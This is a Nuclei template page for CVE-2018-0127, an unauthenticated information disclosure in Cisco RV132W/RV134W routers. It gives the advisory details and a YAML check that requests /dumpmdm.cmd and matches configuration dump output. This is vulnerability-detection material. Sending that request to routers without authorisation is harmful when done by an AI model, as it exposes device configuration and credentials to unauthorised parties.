Skip to content
Nuclei Templates

Cisco RV132W/RV134W Router - Information Disclosure

ID: CVE-2018-0127

Severity: critical

Author: jrolf

Tags: cve,cve2018,cisco,router

Description

Section titled “Description”

Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information.

YAML Source

Section titled “YAML Source”
id: CVE-2018-0127


info:
  name: Cisco RV132W/RV134W Router - Information Disclosure
  author: jrolf
  severity: critical
  description: Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the router.
  remediation: |
    Apply the latest firmware update provided by Cisco to fix the vulnerability.
  reference:
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2
    - http://web.archive.org/web/20211207054802/https://securitytracker.com/id/1040345
    - https://nvd.nist.gov/vuln/detail/CVE-2018-0127
    - http://www.securitytracker.com/id/1040345
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-0127
    cwe-id: CWE-306,CWE-200
    epss-score: 0.09982
    epss-percentile: 0.94853
    cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cisco
    product: rv132w_firmware
  tags: cve,cve2018,cisco,router


http:
  - method: GET
    path:
      - "{{BaseURL}}/dumpmdm.cmd"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Dump"
          - "MDM"
          - "cisco"
          - "admin"
        condition: and


      - type: status
        status:
          - 200
# digest: 4b0a004830460221008ee2e91cbc8b0e70afda98e7171b4797ab17fe43a3363ee341f4f28e9607e76b022100ae1f495c61083d19bacdffba38edafba4134e8ed053355303307d02cd8af2d29:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-0127.yaml"

View on Github